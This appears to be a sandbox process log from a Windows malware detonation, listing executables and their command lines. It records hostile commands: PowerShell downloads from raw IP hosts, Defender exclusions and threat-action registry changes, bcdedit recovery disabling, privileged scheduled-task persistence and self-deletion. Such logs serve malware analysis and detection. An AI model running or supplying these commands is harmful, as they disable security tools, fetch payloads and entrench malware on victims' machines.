"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4968 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3272 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Users\Admin\Desktop\New Text Document.exe

"C:\Users\Admin\Desktop\New Text Document.exe"

C:\Users\Admin\Desktop\a\volumeinfo.exe

"C:\Users\Admin\Desktop\a\volumeinfo.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3244 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Users\Admin\Desktop\a\Zinker.exe

"C:\Users\Admin\Desktop\a\Zinker.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\smartsoftsignew.exe

"C:\Users\Admin\Desktop\a\smartsoftsignew.exe"

C:\Users\Admin\Desktop\a\ADServices.exe

"C:\Users\Admin\Desktop\a\ADServices.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\Desktop\a\New.exe

"C:\Users\Admin\Desktop\a\New.exe"

C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

"C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\New.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x40,0x12c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1

C:\Users\Admin\Desktop\a\volumeinfo.exe

"C:\Users\Admin\Desktop\a\volumeinfo.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 640 -ip 640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 312

C:\Users\Admin\Desktop\a\GTA_V.exe

"C:\Users\Admin\Desktop\a\GTA_V.exe"

C:\Users\Admin\Desktop\a\CapSimple.exe

"C:\Users\Admin\Desktop\a\CapSimple.exe"

C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp" /SL5="$130258,18247052,1148416,C:\Users\Admin\Desktop\a\GTA_V.exe"

C:\Users\Admin\Desktop\a\RambledMimets.exe

"C:\Users\Admin\Desktop\a\RambledMimets.exe"

C:\Users\Admin\Desktop\a\ld.exe

"C:\Users\Admin\Desktop\a\ld.exe"

C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

C:\Users\Admin\Desktop\a\MSiedge.exe

"C:\Users\Admin\Desktop\a\MSiedge.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled no

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5168 -ip 5168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5168 -ip 5168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1596

C:\Users\Admin\Desktop\a\victor.exe

"C:\Users\Admin\Desktop\a\victor.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5060 -ip 5060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 232

C:\Users\Admin\Desktop\a\RambledMime.exe

"C:\Users\Admin\Desktop\a\RambledMime.exe"

C:\Users\Admin\Desktop\a\current.exe

"C:\Users\Admin\Desktop\a\current.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\host_so.exe

"C:\Users\Admin\Desktop\a\host_so.exe"

C:\Users\Admin\Desktop\a\mixinte.exe

"C:\Users\Admin\Desktop\a\mixinte.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\Desktop\a\inte.exe

"C:\Users\Admin\Desktop\a\inte.exe"

C:\Users\Admin\Desktop\a\winlogon.exe

"C:\Users\Admin\Desktop\a\winlogon.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " WindowStyle -Hidden Add-MpPreference -ExclusionPath 'C:\' -Force [Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3' $DownloadUrl = 'http://49.13.194.118/ADServices.exe' $WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method Head Write-Output 'Downloading $DownloadUrl' Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe

"C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7420 -ip 7420

C:\Users\Admin\Desktop\a\setup.exe

"C:\Users\Admin\Desktop\a\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7420 -s 684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\file300un.exe

"C:\Users\Admin\Desktop\a\file300un.exe"

C:\Users\Admin\AppData\Local\Temp\7zS59CA.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe

"C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe"

C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\Desktop\a\buildjudit.exe

"C:\Users\Admin\Desktop\a\buildjudit.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe

"C:\Users\Admin\Desktop\a\buildjudit.exe"

C:\Users\Admin\Desktop\a\lumma1234.exe

"C:\Users\Admin\Desktop\a\lumma1234.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\Desktop\a\go.exe

"C:\Users\Admin\Desktop\a\go.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\random.exe

"C:\Users\Admin\Desktop\a\random.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Users\Admin\Desktop\a\33333.exe

"C:\Users\Admin\Desktop\a\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe

"C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe"

C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe

"C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe" /s

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe

"C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Users\Admin\Desktop\a\lenin.exe

"C:\Users\Admin\Desktop\a\lenin.exe"

C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe

"C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe"

C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe

"C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5676 -ip 5676

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 272

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Desktop\a\alex.exe

"C:\Users\Admin\Desktop\a\alex.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\well.exe

"C:\Users\Admin\Desktop\a\well.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2316

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.exe" /f & erase "C:\Users\Admin\Desktop\a\mixinte.exe" & exit

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe\" PP /XafdidFSQl 385118 /S" /V1 /F

C:\Users\Admin\Desktop\a\swizzzz.exe

"C:\Users\Admin\Desktop\a\swizzzz.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

